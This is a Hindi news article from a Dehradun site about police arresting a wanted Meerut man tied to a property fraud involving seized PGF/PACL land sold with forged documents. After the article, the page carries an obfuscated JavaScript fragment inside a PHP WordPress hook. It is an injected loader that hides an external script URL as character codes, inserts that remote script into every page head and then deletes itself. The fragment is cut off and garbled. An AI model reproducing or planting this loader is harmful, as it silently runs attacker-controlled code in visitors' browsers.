Friday, July 19, 2024
Google search engine
Homeअन्यउत्तराखण्डः हत्या व धोखाधड़ी मामले में मेरठ का इनामी बदमाश गिरफ्तार! डालनवाला...

उत्तराखण्डः हत्या व धोखाधड़ी मामले में मेरठ का इनामी बदमाश गिरफ्तार! डालनवाला पुलिस को मिली बड़ी सफलता, कई मामले हैं दर्द

देहरादून। राजधानी दून के डालनवाला कोतवाली व सेलाकुई थाने में दर्ज मुकदमों में फरार चल रहे मेरठ के बदमाश को डालनवाला पुलिस ने गिरफ्तार कर लिया है। आरोपी पर मेरठ में हत्या व हत्या के प्रयास सहित आठ मुकदमें दर्ज हैं। आरोपी पर 25 हजार रुपये का इनाम था। इस मामले में पांच आरोपित पहले गिरफ्तार किए जा चुके हैं। आरोपितों ने सर्वोच्च न्यायालय की ओर से गठित विशेष कमेटी के सदस्यों के जाली हस्ताक्षर कर संपत्ति बिक्री के फर्जी दस्तावेज तैयार किए और पर्ल्स ग्रीन फोर्ट लिमिटेड (पीजीएफ) व पर्ल्स एग्रोटेक कारपोरेशन लिमिटेड (पीएसीएल) की दून में सीज संपत्तियां बेच दी थीं। रविवार को डालनवाला कोतवाली में पत्रकार वार्ता में सीओ जूही मनराल ने बताया कि पीजीएफ और पीएसीएल की कुछ संपत्तियां विवादित थीं। वर्ष 2015 में सीबीआइ की जांच के बाद सर्वोच्च न्यायालय के आदेश पर देशभर में पीजीएफ की 348 और पीएसीएल की 14000 संपत्तियों को सीज कर दिया गया था। देहरादून के विभिन्न इलाकों में भी पीजीएफ और पीएसीएल की सीज संपत्तियां हैं। बीते दिनों देहरादून में भाऊवाला, धोरणखास, तरला आमवाला, बड़ोवाला व मसूरी में पीजीएफ और पीएसीएल की सीज संपत्तियों को डिफेंस कालोनी स्थित एसपीके वर्ल्ड काम प्राइवेट लिमिटेड की निदेशक पूजा मलिक, संजीव मलिक, जितेंद्र उर्फ जानी और उनके साथियों ने उत्तराखंड, उत्तर प्रदेश व हरियाणा के व्यक्तियों को बेच दीं। इसके बदले आरोपितों ने उनसे एक करोड़ 73 लाख रुपये ठग लिए। इस मामले में छह जनवरी 2022 को आरोपितों के विरुद्ध मुकदमा दर्ज किया गया। उन्होंने बताया कि इस मामले में पुलिस पूजा मलिक व उसके पति संजीव मलिक निवासी डिफेंस कालोनी सहित पांच आरोपितों को पहले ही गिरफ्तार कर चुकी है। गिरोह के सरगना संजीव मलिक का दायां हाथ कहे जाना वाला बदमाश जितेंद्र उर्फ जानी निवासी अमन विहार, सहस्रधारा रोड मूल निवासी ग्राम भगवानपुर, जिला मेरठ फरार चल रहा था, जिस पर 25 हजार रुपये इनाम था। रविवार को एसएसआइ महादेव प्रसाद उनियाल ने उसे ईसी रोड से गिरफ्तार कर लिया।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>